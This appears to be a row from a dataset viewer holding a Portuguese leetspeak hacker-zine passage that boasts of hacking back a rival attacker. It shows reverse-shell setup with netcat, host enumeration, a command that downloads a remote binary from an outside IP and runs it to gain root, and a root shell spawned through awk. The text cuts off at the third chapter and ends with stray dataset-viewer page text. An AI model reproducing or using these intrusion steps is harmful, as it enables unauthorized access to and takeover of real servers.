text stringlengths 0 1.99k |
|---|
* * |
* B0m d1t0 1550 v4m05 4 pwn4g3m!!! * |
* * |
***********************************************************************************************/ |
#include <c4p1tul0.1> /* 0 m35tr3 d05 d15f4rc35 3 53u 1P d3 c454 */ |
#include <c4p1tul0.2> /* R0d4nd0 0 l337 4t4qu3 */ |
#include <c4p1tul0.3> /* 05 4rqu1v05 d3 um h4ck3r */ |
#include <c4p1tul0.4> /* b0nu5 */ |
#include <c4p1tul0.5> /* C0n51d3r4ç035 f1n415 */ |
/* -------------------------------------------- c4p1tul0.1 ------------------------------------------- / |
| | |
| 0 m35tr3 d05 d15f4rc35 3 53u 1P d3 c454 | |
| | |
/ --------------------------------------------------------------------------------------------------- / |
/ huM c0n53g1r 53u r34l 1P d3 4c3550 n40 f0i um4 d45 t4r3f45 m415 d1f1c315 um4 v3z qu3 0 m35m0 | |
| ult1l1z4 5u4 pr0pr14 c0n3x40 d3 c454 l1mp4 53m p4554r p0r qu4lqu3r t1p0 d3 0bfu5c4d0r, 0u um | |
| 51mpl35 pr0xy p4r4 1nv4d1r 53rv1d0r35 4l34t0r105 53m qu4lqu3r cr1t3r10 53m c0n53gu1r 0bt3r | |
| pr1v1l3g105 r00t 0 qu3 t1r4 qu4lqu3r p0551b1l1d4d3 d3 4p4g4r 05 r45tr05 m415 1d10t45 p0551v315 qu3 | |
| 3l3 d31x4. | |
| D3 t0d4 f0rm4 3 b3m f4c1l d35c0br1r 0nd3 pr0cur4r j4 qu3 0 m35m0 c0rr3 p4r4 f4z3r p05t4g3n5 h4x0r5 | |
| 3m 53u tw1tt3r l0g0 qu3 0wn4 4lg0, tw1tt3r 35t3 ch310 d3 p355045 qu3 4cr3d1t4m n45 5u45 | |
| GR4ND35 h4b1l1d4d35 H4H4H4 */ |
[~]# grep "zakrytye" /var/log/apache2/access.log|head -n1 |
191.19.23.155 - - [15/Mai/2020:18:14:31 -0300] "GET /zakrytye.html HTTP/1.1" 200 <------ IP HaxStr0ke |
/* H4H4 f4c1lm3nt3 3nc0ntr4d0 3m qu4lqu3r w3b53rv3r qu3 ele p4554 / |
| b0m 4g0r4 1r31 pul4r t0d4 4 p4rt3 ch4t4 3 d3m0r4d4 d45 t3nt4t1v45 | |
/ 4t3 45 v145 d3 f4t0! H4H4 */ |
/* -------------------------------------------- c4p1tul0.2 -------------------------------------------- / |
| | |
| r0d4nd0 0 l337 4t4qu3 h4h4 | |
| | |
/ ---------------------------------------------------------------------------------------------------- */ |
sec:~# ./rstack -w -r191.19.23.155:8088 -l200.20.50.2:80 -x5 |
Oh yEaH!! |
look at me as i penetrate |
your server seductively! |
... |
... |
... 8=D ~~~~~ |
Enjoy your shell!! |
b33r:~# nc -lvvn 80 |
Listening on [0.0.0.0] (family 0, port 80) |
Connection from [191.19.23.155] port 80 [tcp/ *] accepted (family 2, sport 35884) |
sh-4.2$ echo "0h y34h pwn3d" |
0h y34h pwn3d |
/* H0H0H0 MU1T0 B0M! PWN3D! / |
| / |
| 4cr3d1t3m 0u n40 3l3 t3m um 53rv1d0r c4541r0 l1g4d0 24h ap3n45 pr4 d31x4r r0d4nd0 5c4n / |
| d3 phpmy4dm1n, t0mc4t e brut3f0rc3 de w0rdpr355 e I0T c0m 53u pr0pr10 1P d3 c454 / |
| b451c4m3nt3 05 c0nh3c1m3nt05 d3l3 53 l1m1t4m 4p3n45 4h 3553 t1p0 d3 4t4qu35. / |
sh-4.2$ uname -a;id |
Linux nationalserver 3.10.0-1062.12.1.el7.x86_64 #1 SMP Tue Feb 4 23:02:59 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux |
uid=48(apache) gid=48(apache) grupos=48(apache) |
sh-4.2$ cat /etc/*release*|head -n1 |
CentOS Linux release 7.7.1908 (Core) |
/* huN m45 t3m 4lg0 qu3 35t4 m3 1nc0m0d4nd0.. v4m05 d4r um j31t0 n1550! */ |
sh-4.2$ cd /tmp;lynx --source 200.20.50.2:7977/dec/COS >> COS |
sh-4.2$ chmod +x COS;./COS --lptd=7 |
..................... |
.............. |
fuck the banner, |
we just want r00t |
......... |
..................... |
g0t r00t!? |
sh-4.2# id |
uid=0(root) gid=0(root) grupos=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0 |
/* Y34H !!!! :D */ |
sh-4.2# awk 'BEGIN {system("/bin/bash")}' |
[root@nationalserver ~]# echo "fud3u pr4 v0c3 4m1g0 :)" |
fud3u pr4 v0c3 4m1g0 :) |
/* -------------------------------------------- c4p1tul0.3 -------------------------------------------- / |
| | |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.